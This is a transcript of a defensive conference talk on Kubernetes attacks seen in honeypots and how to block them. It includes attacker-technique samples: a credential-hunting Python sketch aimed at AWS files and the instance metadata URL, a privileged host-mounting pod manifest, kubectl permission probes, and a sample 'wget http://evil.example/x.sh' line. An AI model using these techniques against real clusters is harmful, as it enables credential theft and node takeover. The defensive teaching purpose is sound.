Thanks everyone for coming. Today we're going to be talking about how to keep hackers out of your clusters with five simple tricks — and obviously it's not going to be five simple tricks. Before we start, I want to poll the room a little bit. Who would identify as someone doing mostly security — security engineering, pentesting? Right. More on the SRE, DevOps, systems engineering side? And more on the application development side, software engineering? Pretty great — quite a diverse audience. Cool, so thanks for being here today.

The goal of what we're trying to do today is to start from this stage: you are someone who has to run applications in Kubernetes, and you want to make sure that whenever someone asks you to secure them, you don't feel like this — but that instead you can feel confident, you know how to prioritize things, and you can feel like that.

My name is Christophe. I'm French, as you can hear, I live in Switzerland, and I work at Datadog focusing on cloud security and open source. I'm the maintainer of a few open source projects: one is called Stratus Red Team, another one is called the Managed Kubernetes Auditing Toolkit. And this is Fred.

Hi, I'm Fred. I'm a senior security researcher at Datadog, mainly focusing on threat intelligence, malware analysis, and threat activity.

Great. So on the agenda, we have mostly three things. First, we're going to do a bit of threat modeling of Kubernetes — it sounds like a swear word, but it's going to be fine, don't worry. Then Fred is going to tell us: the first part is the theoretical side, but what do we see in the real world? How are attackers actually doing things? And finally, based on that, we're going to say: these are the things we're going to implement, because they are actually valuable.

We are making two assumptions.
The first one is that we are using managed Kubernetes running in the cloud — EKS, AKS, or GKE — just because it's a different level of abstraction. It allows us to say, for instance, that etcd is going to be secured for us and we don't need to care about it. Who's using managed Kubernetes in one of the major clouds? OK, many people. Not everyone, but the talk will still be relevant if you are running your own cluster on a Raspberry Pi.

So, threat modeling. If we want a user story to start with, it's just: as someone who defends something, I need to be able to understand what the attacks are — because you cannot secure what you cannot defend, and I think the best way to do that is to know how to attack it. It's mostly a matter of looking at the entry points: how is your data flowing through this cluster, where is the network, things like that. And there are two challenges, I think. First, how do you choose the right abstraction level? If we are using managed Kubernetes, we don't want to look at the whole control plane and how to secure things like etcd or CoreDNS, because they are handled for us. Second, how do we prioritize the different attacks that we see?

This is, let's say, the standard use case, way simplified of course. We have the cloud provider. On top of it, we run worker nodes, typically EC2 instances or similar. On top of those, we have pods, and on the left we have the Kubernetes API, which is managed by the cloud provider. In terms of traffic flows, we have mostly three things: the management traffic on the left, which is the traffic that goes to the Kubernetes API; on the right, the data plane traffic, which goes to the applications — if we have web services, that's the HTTP or gRPC traffic; and on the top right, the traffic that goes to the container image registry.
When you run a pod, the kubelet is going to pull the image from the registry. How do we attack all of that? Well, there are a few ways. The first one is to exploit a vulnerability in one of the applications — maybe a Java application running a vulnerable log4j version, something like that. Then, as the attacker, you are inside the pod, and you can do a few things from there. You can try to escape to the host: typically this requires a vulnerability in the Linux kernel or the container runtime, or a pod that is dangerously configured. You can also try to steal cloud credentials — we'll see that in a bit, but in many cases you can actually steal credentials belonging to the underlying worker node using the instance metadata service of your cloud; this is applicable to AWS, GCP, and Azure. And if the pod has some permissions — if it's running under a service account that has a cluster role or a role bound to it — then you can probably steal the service account token and move to the Kubernetes API. If you are able to compromise the credentials of an admin who can access the cluster, you can also hit the Kubernetes API directly. And finally, if you are able to poison one of the images used in production, you can also run code in the cluster.

So that's the minimalistic threat model we use today. The goal is really to say: this is what can happen in theory — now, what do we see in reality? When we say threat model, I think it's also interesting to look at the techniques the community thinks exist for attacking a cluster. There is something called the Kubernetes threat matrix, by Microsoft, which basically tries to split the ways you can attack something into multiple steps.
The first column is initial access — how can you initially hack a cluster. Then you have things like persistence — how do you backdoor something — privilege escalation, et cetera. Each item in this table is one attack that is possible to perform. The question is therefore: what is theoretical, and what is something we should actually care about? For instance, the Kubernetes threat matrix tells you that if an attacker is able to create a malicious admission controller, they can backdoor all of your pods and do malicious things — which is true. But is this something we should actually care about, or is it more theoretical? So Fred, you are a researcher — can you tell us a little about what you researched and what you found?

Yes, thanks. Before deep diving into what we have observed so far, we'll introduce a small concept: threat-informed defense. The idea here is to know your enemy — who you are actually fighting and defending against. In order to do that, you have to gather information, which we call threat intelligence. You want to know about the different attacker groups; their techniques, tactics, and procedures, as shown in the Kubernetes threat matrix; the different types of threat activity; and of course the new vulnerabilities, which are released pretty much every day. Once you have a good picture of all this information, you can put security mechanisms in place. That's basically what we would like to do. However, there are limits to threat-informed defense as well, especially for cloud and containers. First, threat intelligence should drive prioritization, but it should not be an end goal in itself.
Regarding threat intelligence information: there are dedicated feeds on the internet, but they are not always curated, I would say. There are also initiatives from the open-source community — there was a talk this morning about building open-source threat intelligence for Kubernetes, which we mention later in the slides. And yes, there is also a general lack of threat intelligence for cloud and containers. This is the presentation I was just mentioning, so you can get all the information directly there.

Here are our contributions for this talk. First, we did a literature review: reading security research blog posts, and checking the known exploited vulnerabilities. For example, CISA — a US agency — publishes a catalog of vulnerabilities seen exploited in the wild, in real-world attacks, which is quite interesting to take into account. We also looked at research papers, and of course the vendor reports published pretty much every year, discussing the trends they have observed in their customer telemetry. Our second contribution is based on our own observations, thanks to our honeypots.

First, what is a honeypot? A honeypot is a voluntarily vulnerable service that you expose on the internet to mimic a specific service, to lure attackers, and to gather as much information as possible about what they do once they have a foothold on it. We deployed several of them — what we call a honeynet. It's fully automated with CI/CD, infrastructure as code, and so on. We deployed our honeynet in four different AWS regions, with all the monitoring needed to make sure that we don't get compromised ourselves. We then collect all the logs and information, and we created our own honeypot workflow.
On the left, you have the attacker trying to connect to our fake Kubernetes API server. We collect all the logs — thanks to the Kubernetes audit logs — directly into Datadog. On the right, we have the threat intelligence platform, which gathers and aggregates all this information, based on an open source project called Yeti — Your Everyday Threat Intelligence. Then we try to build campaigns. This is the notion from the paper we discussed earlier, with the STIX format and so on. The idea is to define a campaign based, for example, on the Docker image and the command we have seen; we could also take the different environment variables into account. Then we get a Slack notification about new campaigns, and we analyze the payloads further. As you can see here, we have some Base64 payloads, which resolve to more payloads that get downloaded directly onto your workload.

For Kubernetes specifically, we created kwokbot. It's based on KWOK — Kubernetes WithOut Kubelet. The idea is to provide all the functionality of the Kubernetes API server without actually running the pods at the end. And as you can see, we can collect a lot of information about what happens when you expose a voluntarily vulnerable Kubernetes API server.

Cool, so that's the how. Now we can tell you a bit about what we found, and we're going to split it into two categories: what we saw against the control plane — attacks that try to hit the Kubernetes API server — versus attacks that try to exploit the workloads that happen to run in Kubernetes. So Fred, the first thing you want to tell us is that when you expose something to the internet, it gets scanned and exploited very fast. Yes, exactly.
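As an aside on the campaign-building step just described: at its core, it is grouping honeypot events by shared indicators such as the Docker image and the command. Here is a toy sketch of that grouping in Python — the event records and field names are illustrative, not Yeti's actual schema.

```python
from collections import defaultdict

# Hypothetical honeypot events; field names are ours, for illustration only.
events = [
    {"source_ip": "203.0.113.10", "image": "attacker/miner", "command": "./xmrig"},
    {"source_ip": "198.51.100.7", "image": "attacker/miner", "command": "./xmrig"},
    {"source_ip": "203.0.113.99", "image": "alpine", "command": "wget http://evil.example/x.sh"},
]

def group_campaigns(events):
    """Group events into candidate campaigns keyed by (image, command)."""
    campaigns = defaultdict(list)
    for e in events:
        campaigns[(e["image"], e["command"])].append(e["source_ip"])
    return dict(campaigns)
```

In practice you would enrich the key with environment variables or payload hashes, as Fred mentions, but the aggregation idea is the same.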
Once you deploy something exposed directly on the internet, you will be scanned by default — by various web services and companies that simply map the internet and collect information about what is exposed. Here you have an example for our Kubernetes honeypot: as you can see, we got different probes, mainly coming from the US, but really from all over the world. That's one part. You will also be scanned by default by specific web services like Censys, Shodan, and so on. What they do is run scanners across the entire IPv4 address space — and IPv6 as well — to map the exposed services on the internet.

On the left are the results from our honeypots. As you can see, the user agent is literally named Censys. They are not just checking whether you have open ports; they are more aggressive, collecting more details about the cluster itself — as you can see, the different services, pods, nodes, et cetera. On the right is the Censys web service, where you can query for something that interests you — for example, how many Kubernetes pod names are exposed directly on the internet — and you get the results immediately. This is basically what attackers also do in the reconnaissance phase when they want to attack your company directly.

Then you have the commands you would use by default on a Kubernetes cluster to find out what your permissions are and what is possible to do. Here is one example: you can see they are trying to find out whether they can create pods, nodes, services, deployments, and so on. We also see the same thing for listing — the idea being to know what's running there.
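In kubectl terms, the permission probes and listings we logged boil down to standard commands like the following — run against your own cluster (they need a live cluster and kubeconfig), they show exactly what a stolen token could do:

```shell
# Permission discovery — the same checks our honeypot recorded
kubectl auth can-i create pods
kubectl auth can-i create daemonsets --namespace kube-system
kubectl auth can-i list secrets --all-namespaces

# Inventory — what is already running, and where
kubectl get pods --all-namespaces
kubectl get nodes
```

Nothing here is exotic: attackers use the same client tooling defenders do, which is also why these probes show up so clearly in audit logs.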
And finally, you also have attackers trying to grab all your secrets directly. This brings us to cloud credentials. One thing to remember is that we made the assumption that the cluster runs in the cloud, which means the cluster is only as secure as the cloud around it. Typically, when you compromise a cloud identity — an IAM user, for instance — you can access the cluster by design. And we know that IAM user access keys are very easy to leak; these are a few examples. We did some research last year showing that most cloud incidents are caused by leaked cloud credentials — this happens all the time.

This is an example from a presentation at a security conference, from someone who runs an incident response team. They showed an incident where an IAM user was compromised — this is the GuardDuty alert they received. And in this piece of CloudTrail logs — the AWS control plane logs — you can see the attacker using the AWS CLI to access the cluster. So that's one thing.

The second thing is that once you've compromised a pod running in the cloud, it's usually very easy to get credentials for the underlying worker node. When you attack a pod and manage to compromise it, as an attacker you're going to try three things. First, hit what is called the instance metadata service — this is what gives you cloud credentials for the worker node, and unfortunately it works by default in many cases. Second, look for hard-coded credentials on the file system — that also happens a lot. Third, look at environment variables. That's the theory; in practice, this is a real script that we caught. You can see the first line is a list of files that the attacker is trying to target.
They are basically files that look like they could contain AWS credentials. The second and third lines, in this get-AWS-info function, show the attacker hitting the instance metadata service with curl — "give me some security credentials" — which returns the credentials for the underlying worker node's IAM role. Finally, you can see them exfiltrating these credentials to a backend they control. In that case, funnily enough, if you just browsed to this .php endpoint here, you could actually find all the credentials they had stolen, as you can see. We were able to report that to AWS, and they revoked all of these keys.

I also want to touch a bit on container escape vulnerabilities. This is the scenario where you've managed to hack a pod, you're inside it — what do you do to escape out of it? If you read the abstract of this presentation, we said we were going to talk about container escapes and how they are used in the wild. The reality is that there is very little documentation of container escapes being used in the wild, which to me was very surprising. I think there are a few reasons. The first one — and this is from a paper from a few years ago, but it still holds — is that there aren't that many container escape vulnerabilities in container runtimes. This is an example for the most popular ones: only four critical vulnerabilities, three of them with a proof of concept. So the attack surface isn't that wide. The second reason — and these are two pretty well-known red teamers saying it — is: do you actually need a container escape if you can do easier things? If you can just steal cloud credentials and go after the S3 bucket that holds the credit card data, it's much easier.
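Going back to the credential-theft script for a moment: its first two steps can be sketched in a few lines of Python. The file paths and variable names below mirror the kind of locations such scripts search, but they are illustrative, not the attacker's exact list; the IMDS call is shown only as the URL, since it needs a cloud network to work.

```python
import os

# Illustrative candidates, not the captured script's exact list.
CANDIDATE_FILES = [
    os.path.expanduser("~/.aws/credentials"),
    os.path.expanduser("~/.aws/config"),
    "/root/.aws/credentials",
]
CANDIDATE_ENV_VARS = ["AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"]

# Step three in the real script: curl this URL for the node role's credentials.
IMDS_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def find_local_credentials():
    """Return which credential locations exist on disk and in the environment."""
    hits = {"files": [], "env": []}
    for path in CANDIDATE_FILES:
        if os.path.isfile(path):
            hits["files"].append(path)
    for var in CANDIDATE_ENV_VARS:
        if var in os.environ:
            hits["env"].append(var)
    return hits
```

Running the same checks on your own workloads is a cheap way to see what an attacker would find.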
Another reason is that you first need access to a pod, so you need a vulnerable application — and that's harder these days than it was maybe ten years ago. That said, if you don't have plans for this weekend, there is the Pwn2Own contest happening in Vancouver, and for the first time they have explicitly said they will give you $60,000 if you find a container escape in containerd or Firecracker. So if you don't have plans for the weekend, think about it — we might see some new vulnerabilities come out of it. That's something to watch for.

Fred, next you want to tell us that attackers are trying to create workloads. What does this mean — are they trying to create microservices or something? Yeah — basically, if attackers fail to escape to the host directly, what they do instead is create new workloads. There are different ways to create workloads, with different end goals. For one, you can create new workloads just to escalate privileges: create a privileged pod, mount the host file system directly into your pod, and get access to everything you want. You have some examples here of the different executions: creating pods, but also DaemonSets, in different namespaces — kube-system, but also default. They also like to bring their own images. These images are all hosted on Docker Hub — most of them are now deleted, because we reported them as malicious. Basically, they create their own workloads from their own images, with their own tooling directly available inside the image itself.

Another thing to know is that attackers exploit vulnerable software as well — that's part of the game. Attackers exploit vulnerabilities in public-facing applications, most of the time, to get an initial foothold into your containers. That's the data plane side.
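To make the privilege-escalation-by-workload pattern concrete, here is a sketch of the kind of privileged pod we see attackers create — the names and image are invented for illustration; the technique (privileged container plus a hostPath mount of the node's root filesystem) is the real one:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysmon-agent          # often disguised with an innocuous-sounding name
  namespace: kube-system      # or default
spec:
  hostPID: true
  containers:
  - name: shell
    image: attacker/toolbox:latest   # attacker-controlled image from Docker Hub
    command: ["sleep", "infinity"]   # then `kubectl exec` in and chroot /host
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /                  # the node's entire root filesystem
```

A pod like this effectively *is* the node, which is why the admission controls discussed later in the talk focus on blocking exactly these fields.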
Here you have the top five vulnerabilities exploited in the wild in 2023, based on Aqua's report. Attackers also enroll compromised hosts to scan the internet itself. What they do — and this is another payload we caught in our honeypots — is that once they have a foothold in your workload, they use the workload itself to scan the internet, try to exploit new hosts, and compromise them as well. As you can see here, this one came in through a remote code execution vulnerability in Confluence, and they are using open source projects like masscan, zgrab, and so on to scan specific IP ranges on the internet.

So, we have covered — from the literature but also from our honeypots — different parts of the Microsoft Kubernetes threat matrix. Now we would like to know how we can prevent attackers from getting a foothold in our Kubernetes cluster. Christophe, can you please tell us more?

Yes. Again, these are all the attacks we were able to find — either publicly documented or from our honeypots — mapped to the Microsoft Kubernetes threat matrix we showed before. Now, this is all good and shiny, but what do we do? My first question is: should we try to secure our control plane — make our Kubernetes API more secure — or our data plane? The answer, which is kind of obvious, is that you need both. If you secure your Kubernetes API but run your workloads as admin, exposed to the internet with vulnerabilities, your security looks like this. Conversely, if you only secure your workloads but your Kubernetes API is on the internet without authentication, it's not going to end well either.
So the first piece of advice is to get the control plane basics right, and the good news is that in the cloud, with a managed Kubernetes service, you don't really need to manage your control plane. You just need to make sure that authentication is enforced on the API server — which is the default, and actually very hard to disable, which is good. One piece of advice is to minimize the network exposure of the API server: if you can, either put it on a private network or add IP allowlisting. On GCP you have something called the Identity-Aware Proxy, which makes this quite easy. On AWS, most likely you're going to need to put it on an internal network, use a bastion host, or use IP allowlisting.

Another piece of advice: use as little Kubernetes as you need. Obviously, if we don't need Kubernetes, we don't use it. But often we don't even need to manage the nodes, in which case using something like GKE Autopilot or EKS on Fargate is great: you have no control over the nodes, so you don't have to patch them, and you are protected against various vulnerabilities and other things that are quite bad. Otherwise, if you need the full power of Kubernetes, including managing the nodes, managed Kubernetes is a good option. And if you have a full engineering team that can manage your control plane, self-managing is maybe an option too.

The second piece of advice is to block the cloud metadata service from the pods. Your pods have different ways of accessing cloud credentials, but they shouldn't be able to use the instance metadata service. Typically the attack works like this: an attacker compromises a pod, and from that pod they steal the cloud credentials that belong to the instance role of the node it runs on. Here is a very quick demo — it's going to go fast, I know it is 5 p.m.
On the left, I have an application that is vulnerable to command injection, and you see an attacker compromising it; on the right, they run malicious commands — curl against the instance metadata service — and get back credentials that belong to the underlying worker node. One more time: I run a malicious command in this vulnerable application, I curl 169.254.169.254, and I basically get credentials for the instance. From there I can do various bad things. If you're interested, last year I gave a presentation with Diego Gomez from Sourcegraph specifically about these attack vectors — how you can do different kinds of bad stuff in a managed Kubernetes environment. If you want to check it out, the slides will be online, of course.

So what do you need to do? Two things. If you are using GKE, you need to enable Workload Identity, which is enabled by default on GKE Autopilot. On AWS or Azure, you need to explicitly block the access with a network policy.

Now, again, we're in the cloud — it's a normal thing for workloads to access the cloud, and typically there are secure ways to do that, like EKS Pod Identity or IAM Roles for Service Accounts on AWS. These are secure mechanisms through which your Java or Go application can get access to your cloud environment. But I think it's super important to be aware of what kind of access your workloads have: if you have thousands of pods, which ones can be used to pivot to your cloud? One way to find out is an open source project we released last year called the Managed Kubernetes Auditing Toolkit, MKAT. It looks at your Kubernetes service accounts and your AWS IAM roles, and generates something like this, showing that this pod in this namespace can assume this IAM role. Again, that's by design, but it's good to be aware of it — and you might get some surprises as well.
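For the "block the metadata service with a network policy" step mentioned above, a minimal sketch looks like the following — it assumes your CNI enforces NetworkPolicy, and the namespace and policy names are our own examples:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-cloud-metadata
  namespace: default           # repeat (or templatize) per namespace
spec:
  podSelector: {}              # applies to every pod in the namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32   # instance metadata service
```

Note that this policy still allows all other egress; pods that legitimately need cloud access should get it through Workload Identity, IRSA, or EKS Pod Identity rather than through the node's metadata endpoint.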
The fourth piece of advice is to be intentional about what can run in the cluster. If you sit down with your team — with your SRE team — they will probably tell you things like "oh, we don't run images straight from Docker Hub because we hit rate limits," which happens to be good for security as well. What's important is to codify that, and to be able to either alert or block when a workload that you don't want in your cluster gets created. These are things like privileged pods, or pods that mount the host file system — you probably don't want a pod that can mount the host's root file system. So the first step is to alert on it; the second is to block it. There are a few ways to do that: there is Open Policy Agent Gatekeeper, there is Kyverno — these are two kinds of admission controllers — and there is a relatively new feature in Kubernetes called Pod Security Admission, which lets you do some of this, including, since recently, custom rules that you can write as custom resource definitions. The presentation I link below is from an ex-colleague of mine, McCormick; he showed how at Datadog, the compute security team was able to use OPA Gatekeeper for this.

The fifth piece of advice is actually very boring, but application security matters. Much of the time, the way an attacker gets into your cluster is through an application. So all the standard advice applies — this is a great talk by Clint Gibler, who writes the tl;dr sec newsletter. Things like: use a framework, don't try to reinvent session management, and be aware of your dependencies — if you're still using Java 8, it's probably time to update, and also look at your libraries. Using supported versions of your frameworks, things like that, tends to align with good operational maturity anyway.
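To make the Pod Security Admission option concrete: enforcing "no privileged pods, no host mounts" in a namespace is a matter of labels on the Namespace object. The namespace name here is an example; `restricted` is the strictest of the built-in Pod Security Standards levels.

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted   # reject non-compliant pods
    pod-security.kubernetes.io/warn: restricted      # warn clients at admission time
    pod-security.kubernetes.io/audit: restricted     # record violations in audit logs
```

This matches the alert-first-then-block approach from the talk: you can start with only `warn` and `audit`, watch what would break, and add `enforce` once the noise is gone. Gatekeeper or Kyverno remain the right tools when you need rules beyond the built-in levels.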
Now, once you've done all of that, you can try to go to the next level. Personally, I think it's confusing, because sometimes someone will tell you that what Fred is about to show is where you should start, and I don't think that's true. These are the basics to cover first, and then you have some more options.

Yes, you're right: first you need to cover the five simple tricks, and then you can go to the next level. The first one would be, for example, to harden your workloads. There are different ways to do it. First, very carefully choose the image you run in your container — for example distroless images, or just slim Python images. If you just need to run Python code, why would you install a full Ubuntu image? That way, you don't ship what attackers usually rely on once they have a foothold in the container, like curl, wget, or apt — they also run apt install directly. That's the first step.

Then you can add a security context, either at the pod level or at the container level. Setting the read-only root file system to true will prevent the attacker from, for example, fetching additional payloads to execute, or putting persistence mechanisms in place. You can also disable privilege escalation, which prevents the running process from gaining higher privileges inside the container, so they won't be able to do stuff like that. And finally, disable running as root as well.

Then, you can implement runtime threat detection and blocking — using open source projects such as Falco, Tetragon, or Tracee. They all rely on eBPF to monitor your workloads, and you can then be notified of what's going on in the different parts of your cluster.
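The hardening options Fred just listed map to a container `securityContext` like the one below — pod and container names are examples, and the slim base image stands in for whichever minimal image fits your workload:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
spec:
  containers:
  - name: app
    image: python:3.12-slim            # minimal base, not a full Ubuntu
    command: ["python", "app.py"]
    securityContext:
      readOnlyRootFilesystem: true     # can't drop payloads or persist to disk
      allowPrivilegeEscalation: false  # no gaining privileges in-container
      runAsNonRoot: true
      capabilities:
        drop: ["ALL"]                  # shed every Linux capability
```

If the application needs scratch space (temp files, caches), mount an `emptyDir` volume at that path rather than relaxing `readOnlyRootFilesystem`.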
And finally, you can also proactively identify attack paths directly in your cluster. That's another open source project we released a few months ago: KubeHound. The idea behind the project is to answer: starting from a container, how can I become cluster admin, just by exploiting the different privileges associated with my workloads? And then there's hardcore mode: you can also put AppArmor, SELinux, and seccomp profiles in place, and, for example, take image signature and provenance into account. And that brings us to the conclusion.

Yeah, that was a lot. To conclude, a few key takeaways. The first one: whenever we try to secure anything, the first step, in my opinion, is to understand how it can be attacked and to do some basic threat modeling — that's really helpful. Knowing what attackers do is great for prioritization, but if you rely only on that, you're going to change your security strategy every week, and that's not good either. Another takeaway is that there isn't much threat intelligence for cloud and containers yet. This will probably get better, but it's something to be aware of. And finally, some security mechanisms are worth it, while others are much harder to implement and their value is a bit more questionable.

That's all for today. This is the QR code that you cannot leave the room without scanning. If you liked the presentation, please tell us; if you didn't, please tell us too. And if you like the tl;dr sec newsletter, there will be a blog post version of this presentation tomorrow, so if you prefer to read it or to forward it, that's a good way. Thank you very much.